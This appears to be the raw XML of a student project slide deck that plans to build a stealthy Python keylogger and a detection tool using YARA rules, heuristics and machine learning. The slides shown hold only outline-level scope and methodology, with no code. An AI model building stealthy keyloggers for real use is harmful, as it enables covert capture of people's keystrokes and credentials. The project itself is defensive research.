        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Google Shape;115;p17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3200"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2800"/>
              <a:t>Implementing K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-IN" sz="2800"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2800"/>
              <a:t>ylogger and Detecting Kelogger</a:t>
            </a:r>
            <a:endParaRPr sz="28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Challenge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: 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Keylogging malware poses a significant threat to user privacy and data security by stealthily capturing keystrokes.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Traditional antivirus solutions struggle to detect new, obfuscated, or polymorphic keyloggers.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Keyloggers can bypass signature-based detection using techniques like code obfuscation.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Objective</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:The objective is to develop a keylogger and implement a multi-layered detection tool using YARA rules, heuristics, and machine learning to ensure accurate detection with minimal false positives. Additionally, a user-friendly interface will display alerts and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>reports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 idx="4294967295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Scope of the project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Google Shape;121;p18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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-327660" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="520"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="114000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2800"/>
              <a:t>Keylogging Malware and Detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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Scope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: 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Create a functional keylogger to simulate real-world malware behavior.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Implement YARA rules, heuristic analysis, and machine learning models to detect keyloggers.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Develop and test on Windows with scope for future cross-platform support.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Target Audience</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Cybersecurity Researchers, Students and Developers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US"/>
              <a:t>,IT Security Professionals.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" alt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Deliverables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: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Python Keylogger: A functional keylogger demonstrating keystroke capture.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Detection Tool: A multi-layered detection solution using YARA rules, heuristics, and ML models.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-272415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GUI Application: A simple interface displaying alerts and logs.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Scope of the project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Google Shape;127;p19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3200"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2800">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Keylogging Malware and Detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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3200"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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Inclusions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: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Development of a Python-based keylogger to capture keystrokes stealthily.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Implementation of multi-layered detection techniques.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GUI development to display detection alerts and detailed logs.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Technical documentation covering design diagrams, implementation steps, and test results.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 b="1"/>
              <a:t>Exclusions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: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Cross-platform keylogger development (e.g., macOS or Linux) beyond Windows OS.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Network-based intrusion detection systems (NIDS) or real-time cloud-based monitoring.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Scope of the project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Google Shape;133;p20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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-312420" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="520"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="114000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Keylogging Malware and Detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: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Keystroke Logs: Data captured from the developed keylogger, including all user keystrokes.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Training Dataset: Sample datasets of malware behaviors and benign activities used to train the ML model.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 b="1"/>
              <a:t>Limitations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: Data constraints, resource limitations.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Platform Dependency: The detection tool is primarily tested on Windows OS; cross-platform testing is limited.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Limited Dataset Size: The performance of the ML model may be constrained by the size and quality of the training dataset.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-259080" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="520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Real-Time Detection Challenges: The tool may not support continuous, real-time monitoring due to resource constraints.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000"/>
              <a:t>Methodology</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Google Shape;139;p21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524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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1"/>
              <a:t>Methodology for Implementing Keylogging Malware and Detecting Keylogging Technology</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" b="1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Keylogger Development: Create a Python-based keylogger to capture and store keystrokes stealthily for testing purposes.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Detection Techniques: Implement multi-layered detection using YARA rules, heuristic analysis, and machine learning models.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GUI Development: Build a user-friendly interface for real-time alerts, log viewing, and threat reports.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Testing &amp; Validation: Conduct extensive tests with known and custom keyloggers to evaluate detection accuracy and minimize false positives.</a:t>
            </a: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endParaRPr lang="en-US" sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-32766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000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900"/>
              <a:t>Integration &amp; Documentation: Combine all components into a cohesive tool and prepare detailed documentation with findings and recommendations.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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 idx="4294967295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4000"/>
              <a:t>Methodology</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Google Shape;145;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286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/>
              <a:t>Implementing Keylogger </a:t>
            </a:r>
            <a:endParaRPr sz="28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Design and Development</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2400"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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Data Storage.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Stealth Operation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2400"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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Testing in Sandbox.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Simulate Attack Scenarios.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-3175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•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Detecting Keylogger</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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Detecting Keylogger.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Heuristic Analysis.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Machine Learning Integration.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GUI for Alerts and Reports.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Testing and Optimization.</a:t>
            </a:r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Implementing the improvements.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13241</Words>
  <Application>WPS Presentation</Application>
  <PresentationFormat/>
  <Paragraphs>371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Times New Roman</vt:lpstr>
      <vt:lpstr>Noto Sans Symbols</vt:lpstr>
      <vt:lpstr>Segoe Print</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Statement of the Problem</vt:lpstr>
      <vt:lpstr>Scope of the project</vt:lpstr>
      <vt:lpstr>Scope of the project</vt:lpstr>
      <vt:lpstr>Scope of the project</vt:lpstr>
      <vt:lpstr>Methodology</vt:lpstr>
      <vt:lpstr>Methodology</vt:lpstr>
      <vt:lpstr>Architecture Diagram/Flow</vt:lpstr>
      <vt:lpstr>Algorithms used</vt:lpstr>
      <vt:lpstr>Algorithms used</vt:lpstr>
      <vt:lpstr>Hardware and software selection </vt:lpstr>
      <vt:lpstr>Implementation</vt:lpstr>
      <vt:lpstr>Important Code segments</vt:lpstr>
      <vt:lpstr>Important Code segments</vt:lpstr>
      <vt:lpstr>Important Code segments</vt:lpstr>
      <vt:lpstr>Important Code segments</vt:lpstr>
      <vt:lpstr>Output</vt:lpstr>
      <vt:lpstr>Output</vt:lpstr>
      <vt:lpstr>Output</vt:lpstr>
      <vt:lpstr>Output</vt:lpstr>
      <vt:lpstr>Results</vt:lpstr>
      <vt:lpstr>Results</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Future Work</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>Questions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Vikash SM</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-27T07:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-24T16:52:17Z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208CD339102A4F2782E4DABEFF430CEB_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2057-12.2.0.18639</vt:lpwstr>
  </property>
</Properties>
</file>